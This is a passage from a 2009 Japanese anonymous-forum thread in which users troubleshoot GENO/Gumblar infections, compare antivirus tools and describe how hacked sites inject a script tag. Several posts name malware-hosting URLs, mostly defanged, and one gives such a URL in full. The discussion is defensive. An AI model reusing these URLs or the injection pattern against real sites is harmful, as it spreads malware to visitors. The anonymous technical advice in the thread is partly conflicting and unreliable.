540 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 00:50:55 ] すまん感染の疑いのある者なんだがご教授願いたい 当方win機(一昨日買ったばかりwin7)とMac(OSX10.4)を使っている。 これらを使ってxoopsを使ったサイトを立ち上げようとした。 xoopsの構成ファイルをアップロードしようとしたらmacでは問題なくできた。 しかしwin機を使わなければならない事情がでてFFFTPを使ったら毎回225 ABORcommand successfulが出て強制終了がでる。 このエラーをググったらGENOウイルスの仕業らしい、と。 自分的には可能性として 1.win機が感染している 2.Mac機が感染、もしくは保菌者(?)になっている 3.レンタルサーバーの業者自体が感染している なお、ウイルス対策としてはwinは買ってすぐマカフィーをインストールして最新の状態 Macは6月末にvirusbarrierが切れたからClamXavでつないでいる状態、最新の状態 現在フルスキャン中ですがウイルスは見あたってません。このスレの皆さんの知恵がいただければ幸いです。
541 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:17:31 ] >>540 前回のGENOに感染した疑いがあるなら、どのアンチウイルスソフトでも、 そのウイルスがあれば見つけてくれると思うけど、今騒がれてるやつだったら、 上で上がってるカスペとかでスキャンしたほうが、感染してるかしてないか 確実にわかるんじゃないかな 今回の亜種は前回よりやばいかもと思ったが、カスペがちゃんと検出してくれるようなら、 むしろ4月の時よりすぐに検出駆除してくれるだけ簡単というかマシなのかなと思った ただ、起動しない状態まで感染してしまうと結構厳しいみたいだが
542 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:34:17 ] >>541 ありがとう。たった今マカフィーフルスキャン終わったが感染無しだった。 Macのほうはメインマシンだから1日かかりそう>< とりあえず明日鯖業者にも連絡取ってみる+カスペたんの導入を考えてみる
543 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:52:04 ] Avast!がPDFの検出をするようになった SWFは未確認
544 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:02:39 ] もうすぐnortonの期限が切れそうでどれにしようか迷っている ノートンは最近の物は常駐時の挙動は割と軽くIDセーフ機能が便利なんだが対応が遅い・・ カスペルスキーは昔使っていた事もあったけどアプリに過剰反応したりと癖が強い印象
545 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:05:35 ] スレ違いっぽいが GENOの話ならノートンは対応してるぞ
546 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:10:38 ] 新型対策ならカスぺだろうが、亜種への対応には限界があり全てはカバーできないというのは念頭に置いた方がいい flashとpdfに見切りをつけて更に常時、JS無効は現実的ではないからOSをVista以降にするのがベストだろう
547 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:13:07 ] 一口にGENO(新旧gamblar)と言っても、いくつものファイルが関係するから ウイルス対策ソフトがどの段階で検知するかはマチマチ 全部スルーして、穴があるシステムはやられる
548 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:14:39 ] MSの脆弱だけじゃないからね。 Adobeの脆弱性はノートンはやってくれないし。
549 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:16:51 ] >>548 やってくれないとは? 間違いだと思うが
550 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:19:31 ] 嘘ばっかり言いやがるからな 2chだし適当に
551 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:19:31 ] >>530 www.virustotal.com/jp/analisis/cddad168eb28751f3b9a7670ca03d0e8cee1745f7c746ded2fcc5daf463e570f-1256576880 > Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。 > G Dataが「JS:Downloader-EZ」で13件を検出した。 G DataのEZって…
552 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:24:38 ] >>546 ベストかもしれないが、現実的には_ うちの事務所は、みんなXPだし とりあえず、うpだて最新にしとくことか…
553 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:32:28 ] そういえばアドビやSunJavaのブラッドハウンドは見たことないね
554 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:37:29 ] >>546 個人なら切り替えはまだ容易だろうが 企業、特に中小企業だと業務用のPC全てを XPから切り替えるのは容易ではない
555 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:41:37 ] このスレを覗きに来るような人たちには釈迦に説法だろうけど、 パッチ管理は多少面倒でももっとも効果的な対策 個人利用は無料のSecunia PSIで定期的なチェックをお勧め Secunia Personal Software Inspector(PSI)ダウンロードページ ttp://secunia.com/vulnerability_scanning/personal/ 日本語訳がこなれていないから、当面は英語設定で使うほうがいいかも
556 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 03:06:16 ] >>548-550 >>553 > 嘘ばっかり言いやがるからな > 2chだし適当に ttp://www.symantec.com/ja/jp/business/security_response/threatexplorer/threats.jsp こちらを自分の目でご覧になりました?
557 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 03:11:55 ] >>556 何を言いたいんだ? 書いてあるねってことかな
558 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 06:54:08 ] 今回のはもう他のウイルスと同じで、仮に感染してもOS起動が出来る場合は カスペやAvastやノートン?でスキャンすれば検出や駆除が きちんとできると思っていいのかな? それなら感染してるのか分からずにパニクらずにすみそうで少しだけほっとした。 またすぐに違う亜種がでたらそれは別だろうけど。
559 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 07:09:31 ] >>539 タスクスケジューラに登録するなら、窓の杜からじゃなく本家から落とした方がいいよ。 新バージョンで「Quietモード」が追加されてる。 hide9999.web.fc2.com/
560 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 16:58:43 ] Gumblar再襲来(5) 感染でパソコン起動せず、サポート窓口に電話殺到 ttp://www.so-net.ne.jp/security/news/view.cgi?type=1&no=2047
561 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:22:52 ] 感染したHDドライブをスキャン中。 ノートンひっかかってくれるかな。。。
562 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 18:30:55 ] 未知の脆弱性を突かれたわけでもないのに、いつまで感染広がるんだろ。
563 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:37:47 ] くるくるたああああああああああああああああいむ
564 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:51:34 ] すでに10万ファイル調べてるのにひっかからん くるくるたああああああああああああいむ
565 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 18:59:10 ] Wエンジン故に通常使用ではやや重くて使い物にならないかもしれんが こういった一時的な利用なら カスペルとAVASTの両方の検索エンジンを搭載した G-DATAでスキャンしてみるのも良いかもしれない
566 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 19:01:59 ] >>561 ノートンならスキャンパフォーマンスプロファイルの設定を完全スキャンにしているか?
567 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 19:06:11 ] 今のG-DATAはカスぺじゃなくてBitDefenderとavast!なのよね
568 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 00:57:50 ] だから良くなったんだろ
569 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 04:46:17 ] www●george-ohtsuka●com これはGENOですか?別のウイルス?
570 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 05:46:27 ] >>569 流行のGENO踏み台型感染(Web改ざん)タイプ、サイト管理人のPCも感染してる </head>と<body>の間にscriptを1行仕込まれている script src=●●●●//psunrise●cn/images-d/index2●php
571 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 06:31:28 ] >>569 あとよく見ると<body>に続くiframe内のlifezilla.ru:8080/index.phpも怪しい どうしてオランダ?
572 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 07:27:02 ] >>569 新型GENO(gumblar.x)と、iframeインジェクションの両方に改竄されてるね。 ちなみに>>525 の報告のように、 gumblar一派とiframeインジェクション一派は抗争中らしいw ttp://blogs.yahoo.co.jp/noooo_spam/archive/2009/10/27 ttp://ilion.blog47.fc2.com/blog-entry-155.html ショバ(botに引き込む無防備なPC)を取り合ってるのだろうか。
573 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 14:40:46 ] 感染したHDD、定義済みノートンで検知せず。 カスペでスキャン中。 やっぱりリカバリしかないのかな。 どっちにしろレジストリいじらなきゃだめか。
574 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 16:53:40 ] >>573 リカバリしてもレジストリいじらなきゃだめなの?
575 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 17:19:46 ] リカバリしたらレジストリも初期状態になってるからいじる必要はないと思うが。
576 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 20:59:36 ] >>573 どうして感染したと分かるの? 起動時に黒い画面? 黒い画面だと、どうやってPCを起動させて、スキャンしてるの?
577 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:03:05 ] IQが低いとそんな書き込みしかできない
578 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:25:51 ] PCが、いちだ〜い、にだ〜い、… ヒュ〜、どろどろどろ…
579 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:58:53 ] >>575 ドライブがリカバリディスクを認識するものの 数時間まっても始まらないから、そこらへんもやられちゃってると思う。 調べた感じだとちゃんと読み込んでリカバリできるケースが多いみたいだけど。 一応カスペにトロイがひっかかったけど、明らかに今回のと違うやつなんだよな。。。 スキャニング後に復活したという報告もあるから、接続してみてダメそうだったらレジストリいじってみるよ。 とりあえず1症例として書いてみました。
580 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 23:07:03 ] それは別のもんに感染してるんじゃないの あとCDもしくはDVDドライブからの起動にしてる?
581 名前:579 mailto:sage [2009/10/28(水) 23:36:31 ] カスペのスキャン後に復活したみたいです。 ありがたいことにレジストリまで修正してくれるみたいだ。 駆除リストから詳細を調べたいが、 カスペがウィルスリストをぜんぜん登録してくれてない。。。 不具合としては、ユーザープロファイルが読み込めなる様子。 アカウント移行すれば問題ないです。 >>580 今回のでビンゴだったみたいです、 カスペの公式サイトのウイルス名と違ったもので。 ありがとうございます。
582 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 23:41:55 ] 検出名隠蔽してたら誰もわからんわな
583 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 08:53:46 ] これはGENOウイルスでしょうか? 症状: Vistaにて 起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。 セーフモードだと起動。 regeditとcmdは起動。 sqlsodbc.chmも存在。ファイルサイズは通常通り。 どうでしょうか?
584 名前:名無しさん@お腹いっぱい。 [2009/10/29(木) 11:43:10 ] 1.感染したマシンからHDD抜く 2.HDDケースに入れる 3.感染していないPCにカスペたん入れる 4.感染しているHDDを外付けで3.のマシンに接続 5.スキャン で駆除できるのかな? 人柱も嫌だし感染マシンが無いので検証してないけど
585 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 15:34:50 ] >>583 >起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。 この症状はもろにそんなかんじだね
586 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 18:05:01 ] >>583 UAC切ってたのか?
587 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 08:52:48 ] >>583 いえ、ONにしてました。 悲しいのは、adobeを更新した次の日にこのような状態になってしまったことです。
588 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 14:53:51 ] 利用してる脆弱性はAdobeだけじゃないんでなんとも まあおかしいことは事実だし、よくわからんならOS入れなおしたほうが早いね
589 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 17:16:28 ] 構造的には現状ではUACはスルーできんはずだが? 特にvistaのUACは7のデフォルト設定より粘着質 勢いで許可したかupdateのフェイクにでも引っかかったか
590 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 17:26:15 ] >>583 カスペルのオンラインスキャナーではどうなりました?
591 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 18:41:44 ] >>583 それGENOじゃあないだろ Daonolだと思うんだが?
592 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 18:51:27 ] Daonolはvistaは対象外で手口もGENOとそう変わらない
593 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/31(土) 02:12:59 ] じゃあなんなんだ 別のウイルスかハードの寿命か
594 名前:名無しさん@お腹いっぱい。 [2009/10/31(土) 10:30:44 ] パソコンのことはよく知らずにいたのが わるかったんだけどなんかうちのサイト、感染したっぽい。 avast!が反応するようになっちゃった。 ファイル名 ttp://hd-select●com/blog/mail/mail_test.php マルウェア名 JS:Redirector-H7 [Trj] って出るんです。 ファイル名のサイト、バイクの通販かなんかだがこんなサイト いったことないのになあ。 感染確認の類は全部やって異常は見られなかったけど 悲しいかな、サイトは削除しました。
595 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/31(土) 18:08:11 ] 典型的なGENOですね バイクの通販サイトは・・・多分、あそこかなw
596 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:08:38 ] 質問させてください OSはXP、セキュリティソフトはウイルスバスター2009を利用しています。webからの脅威でこんなアドレスがあったんですがgenoなんでしょうか↓ fancyrat ●ru/cgi-bin/pomet2008●php とりあえずファイルの起動・サイズの確認とウイルススキャンはしましたが異常は特になし。毎度ソフトのアップデートはしてるとは言え感染しているか心配です。
597 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:12:15 ] 要求されたURLのWebページを表示できません URL: fancyrat.ru/cgi-bin/pomet2008.php このWebページはウイルスに感染しています 次のウイルスが見つかりました: Trojan-Downloader.JS.Gumblar.x
598 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:12:58 ] aaa miss url変えてなかった。 開かんでおくれ。
599 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:44:40 ] >>594 関係ないサイトのコードが注入されるのが典型的なパターン サイトは削除だけじゃなくそのサイト自体が無効にならないと そのままのっとられる可能性があるので注意してください 感染確認というのが旧型Genoの確認方法だとしたら意味がないので カスペルスキーなどほかのスキャンエンジンでスキャンしてみてください
600 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:45:56 ] >>596 はい 新型のほうのGenoです スキャンは他のメーカーのでもしてみてね
601 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 01:00:36 ] レス下さった方ありがとうございます、新型なんですね…… バスター・ノートンのオンラインスキャンでは今のところ何も検出されてません。早めにOSのアンインストールしたいと思います。
602 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 02:29:58 ] 最新の定義ならブロックしてくれてる可能性もあるが まぁ、カスペルスキーのオンラインスキャンをしてみてはどうだろう
603 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 03:26:46 ] firefox用のpdfプラグインは9.1.0.163が最新? readerは9.2だけどこれでいいのかな
604 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 03:40:56 ] 今更だけどなんでこうなったという感じだな 去年くらいから兆候があったと思うけどここまで広がるとは思ってなかった 一体、Gumblarの作者は何を考えて作ったんだろうか vistaだけど巡回しまくるから油断はできないな
605 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 14:01:26 ] >>597 情報収集をするためにこのスレをロムっていたが ミスって踏んでしまった…
606 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 14:20:11 ] >>605 大丈夫?
607 名前:605 mailto:sage [2009/11/01(日) 19:42:24 ] >>606 まとめの感染確認方法で調べてみましたが 一応、セーフでした、お騒がせして申し訳ありません。
608 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 20:19:53 ] それは意味ないと何度言えば
609 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 21:12:40 ] vista/7ならおそらくセーフ XPならバスター・ノートンはスルー報告有でカスぺ・G-DATA・Avast以外はアウトかも 新型が未知のセキュリティホールを突いていたらの話だけど
610 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 22:11:53 ] GENOに限った話ではないのですが、 ウイルスによって改ざんされているサイト管理者に対してメールでお知らせする場合に 的確かつ、相手に対して失礼にならないような文面のテンプレないでしょうか?
611 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 22:44:39 ] >>610 メールで教えるのは考え直した方がいいかと
612 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 23:53:21 ] >>610 どんなに丁寧にいっても聞かないやつは聞かない ぼくの環境では異常ありませんけど^^;とか言われる レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ
613 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 16:11:17 ] >>597 こういう判定ってどこでできるの?
614 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 17:34:15 ] aguseで確認すればいいだろ。
615 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 19:55:16 ] 過信は禁物だけどな
616 名前:610 mailto:sage [2009/11/02(月) 20:48:14 ] 調べてみたところレンタルサーバだったので、そっちの連絡フォームから通報してみました。 www.ipa.go.jp/security/todoke/ ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・
617 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 20:52:12 ] >>616 報告したならもうそれでいいだろ >ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・ ってわざわざうrl貼られても困るしここで聞くことじゃない
618 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 20:53:53 ] >>617 それは大変失礼しました。
619 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 21:44:39 ] >>616 どちらでも何らかの対処はされると思います レンタルサーバ側に直接連絡してもたいていは対応してくれるはず 数日様子見て直らないようならIPAにも連絡すればいいんじゃないかな
620 名前:名無しさん@お腹いっぱい。 [2009/11/02(月) 22:29:02 ] ずいぶん情報集まってきたな itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/
621 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 00:09:53 ] すみません、情報下さい。 クレクレなのは承知です デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから 復帰する時にgenoウイルスに感染した様です。 起動すると真っ黒な画面にマウスポインタがポツリ。 セーフモードでも同様。 とにかくデータだけでも救出しようとして、ubuntu 9.04のライブCD挿入。 しかし、エラー多発で起動せず。 前回は動作したのでメディアの問題ではないかと。 で、富士通のサポートHPによると回復できる様ですが、 その際データが消去されないか心配です。 その点については触れられていなかったので・・・ ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。 この場合、データは消去されてしまいますか? 本当に困っています。 釣りではありません。 どうか教えて下さい。
622 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 00:41:41 ] >>621 > デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから > 復帰する時にgenoウイルスに感染した様です。 このとき感染したんじゃなくてその前から 感染してて復帰タイミングで発病したってだけでしょ ubuntuの前回使用はいつなの? メディアの問題じゃないってなんで断言できるの? コマンドプロンプトからの復帰もしくはリカバリと https://www.fmworld.net/cs/azbyclub/qanavi/jsp/qacontents.jsp?PID=0408-4161&rid=204#case2-1 コマンドプロンプトの操作だけで復帰できればおそらく問題なし リカバリが必要だとすればリカバリディスクにバックアップツールがあればできそう マイリカバリにありそうな感じだけどFMV使ったことないのでわかりません > ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。 これは何が言いたいのかわかりません。 > 本当に困っています。 だから何? 本当に困っててわからないならどこかに有償サポート求めたほうがいいと思います。
623 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 01:16:49 ] >>622 私の書き込みによって不快にさせてしまいましたか? もしそうであれば申し訳ありません。 データは消えないという事で、安心しました。明日、ゆっくり対処しようと思います。 それでもダメでしたら、素直にメーカーに修理にだします。 ありがとうございました。 スレ汚しすみませんでした。
624 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 04:49:27 ] 管理人が気が付いて対処するまで、新型に感染してたサイトとは知らずに そのサイトが感染してた期間中頻繁にアクセスしてたので、 今回100%感染したと思ってたのだが、カスペ試用版でスキャンしても何も検出されず、 黒い画面で立ち上がらないという症状もなく、どうやら感染してないようなのですが、 むしろなぜ感染しなかったのか不思議です。 OSはXPSP2で、カスペとは違うアンチウイルスソフトは最新にしていて、 AdobeやWindowsUpdateは最新のものは気が付かなくてあててなくて、 最新のひとつかふたつ前ぐらいのバージョンの状態でした。 Vistaでも感染してる人もいるのに、こんなんでも感染しなかったのが謎ですが、 それともカスペでも検出しないなにかあったりして、実は感染してるとかなのでしょうか? 前回のGENOみたいに、感染したらファイルのサイズが変わるとか 確認できる方法があれば、まだ分かりやすいのにな。
625 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 05:07:04 ] >>624 最新のひとつかふたつ前だったからOKだったんだなきっと
626 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 05:36:11 ] >>625 やはりそう思われますか? 過信はもちろん禁物ですが、今回の新型に限っては カスペルが感染してたら検出できるようですし やっぱりギリギリセーフだったのかな? ということは今回の新型は、最新のひとつかふたつ前より更に前の 脆弱性を狙ったものだったということになるのかもしれませんね。 もちろん自分がたまたまなだけかもしれないし、常に最新にしておくのが当たり前ですが。
627 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 07:21:58 ] いろんなサイトを巡回する人は特に注意 OSとAdobeのアップデート XPでもFirefox+NoScriptでだいたいは防げる
628 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 09:46:35 ] お客様のPCが起動不能に どうやらDaonolのようでした
629 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 20:06:21 ] >>624 挿入されたサイトのスクリプトが無効化されたあとのアクセスなら何も起こらない 被害サイトアクセスした時期によるかも 脆弱性はAdobeのものだけじゃなくOSのものも含まれてたんで 更新してなきゃくらってたはず
630 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 20:07:24 ] ついでにこれを機にSP3まであてて最新のパッチを当ててね
631 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 21:28:47 ] >>629 無効化されたあとではなかったみたい。 そのサイトの説明だと、感染して改変されてから5日間くらい気が付かずに、 感染そのままの状態だったようで、その間何度も見にいってたから、 最新にはしてなかったから絶対に感染したと思ってました。
632 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 22:47:25 ] >>631 そのサイトがどこかわからんけど無効化されていたかどうか 実際に見てないならわからないよ サイト管理者が確認したのは自分のサイトの改変だけじゃないの 実際に有害なのはそのサイト自身ではなく、そこに挿入されてる他所のサーバのスクリプト 自分のサイトは改変されてても挿入元がすでに消去もしくは コード改変による無効化が行われていたとしたら閲覧したPCに被害は ないかもしれないってだけだよ
633 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:00:36 ] >>632 なるほど!スクリプトなどを書かれてソースコード改変イコール確実に感染 かと勝手に思っていましたが、そのサイト管理人でも気付かないうちに、 挿入元がすでに消去とかされてる場合もあるのですね。 FTPにもかなり何度もアタックがありパスも書き換えられて 盗み見されたようでいたちごっこのようだったとも書かれていたので、 その時間帯も閲覧してたからもうだめぽと思って、カスペルスキーでスキャンかけまくりましたが、 そういう場合もあるのだと初めて分かりました。無知で恥ずかし杉ますが、 分かりやすく何度も教えて下さって本当にありがとうございます。 検出結果もゼロでしたし、感染しなかったんだとようやくこれで安心できそうです。 でもこれからはもっとupdateとか気をつけなければ。 本当にレスありがとうございました。何度もうざい連投すみません。
634 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:27:03 ] 何度も改ざんされたなら生きてるとこを挿入されそうな気がするけどなあ ブラウザが古いキャッシュでも見てたのかな
635 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:29:26 ] コード改変による無効化って、感染→スクリプト挿入などのコード改変 →更に自動的に無効化? うーん? 今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、 そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな? スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、 更に最終的に立ち上がらないようにまでしてしまうということなのかね 仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、 そこで終わってセーフてことか
636 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 01:35:36 ] 挿入元の攻撃スクリプトが内紛か何かで無害なコードにおきかわったらしく それを適当に無効化っていっちゃってるかんじですはい なんつーかよくわからないまま混乱しちゃってるんじゃないかな めんどいんで引用で > 今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、 > そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな? なんかちょっと違う気もするけどなんとなくはい > スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、 これはいいえ 脆弱性があってもなくても仕込まれたサイトを閲覧すればスクリプトコードは読み込みに行く 攻撃が失敗か成功かってだけ > 更に最終的に立ち上がらないようにまでしてしまうということなのかね これは向こうのミスでそうなってしまったらしい 情報搾取が目的だから起動不能になるのは失敗なはず ならないパターンもあるかもしれないしないかもしれない > 仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、 > そこで終わってセーフてことか まあはい そのへんはFirefox+NoScriptでブロックってことだけど理解できない人にはおすすめできない 一般ユーザーから見たらOS含めた各種ソフトの更新とセキュリティ対策ソフトを きちんとインストールってのが基本的な対策なことに変わりはないんで変に混乱する必要はないです
637 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 02:40:54 ] あくまで基本であってこの手の問題は永遠のいたちごっこだからねぇ 今はXPがたまたま脆弱性を突かれただけで 当然この先Vista、W7の脆弱性を狙った新種や派生が次から次と現れてくるだろうから ネットに繋いでる以上は常にリスクと隣り合わせなんだっていう 自覚を忘れないことが大切だと思うよ
638 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 02:45:39 ] それぞれを最新UPDATEしてたら攻撃されても阻止でき、感染せずにすむってことか 反対に阻止出来ず感染したらカスペスキャンで検出され駆除のパターンてことか 丁寧にサンクス! >>634 何度もその感染してた期間に閲覧してたみたいだから 古いキャッシュでも見てたというのはさすがにないんじゃないか? それとも攻撃側がってことか?
639 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:00:00 ] だよなー なんだろうなあ カスペのスキャンが実は古かったとかないよね
640 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:04:38 ] 今のところ突かれている脆弱性は既知のものだけなのは幸いだな。 攻撃側も未知の脆弱性を探し出すほどの暇人やスーパークラッカーではないってことだろう。
641 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:19:32 ] 偶然発見しちゃうときもあるから大丈夫ともいえないけどね
642 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:33:03 ] >>639 カスペは試用版ですが、データはもちろん最新にしてスキャンしました。 foxとノースクリプトを使っていたので大丈夫だったのかな? とも思ったのですが、やっぱり感染してないのがおかしいみたいですよね…。 やっぱり安心せずにリカバリするべきなのかな…。
643 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:36:31 ] 今回の新型、今までのレスとか情報を見ると、カスペルスキーで検知された場合には gumblarで検知されて駆除されるんだよね 実際にカスペルスキーで見つかって駆除した人いないかな?
644 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:39:13 ] >>642 NoScript使ってたなら普段のドメインとは別の見知らぬドメインがブロックされてたはず それで大丈夫だったのかも まあ心配ならリカバリが一番安全安心確実
645 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:48:40 ] ちと疑問 新型GENOは、感染してからファイルやデータを バックアップしても平気というか間に合うのか?
646 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 07:23:33 ] GENOはBIOSやブートセクタや他のファイルを書き換えてくタイプでないし リストアする際にレジストリを復元しない限り不活性化されたまんまHDDに残るんでないかい?
647 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 08:13:05 ] >>583 おれもWindows7で同じような状態になっちゃったんだけど、それGENOウィルスじゃないかもしれない もしかしてWindowsの方のセキュリティにあるアクセス許可、AdministratorsとかSYSTEMとかを変えたりしなかった?
648 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 16:41:38 ] >>646 不活性化されたまんまHDDに残るを詳しく頼む
649 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 16:53:48 ] そのまんまだよ 動かないけどファイルは残ってるってこと
650 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 18:08:37 ] バックアップデータをリカバリしたパソコンに戻しても大丈夫だが、 もしかしたら攻撃の痕跡が残ってるファイルがあるかもなってことだ
651 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 23:35:48 ] でもレジストリまでそのままリストアしたらアウトってこと レジストリ内にGENOを起動させる設定があるからね きちんと修正したレジストリならば戻しても大丈夫じゃないかな
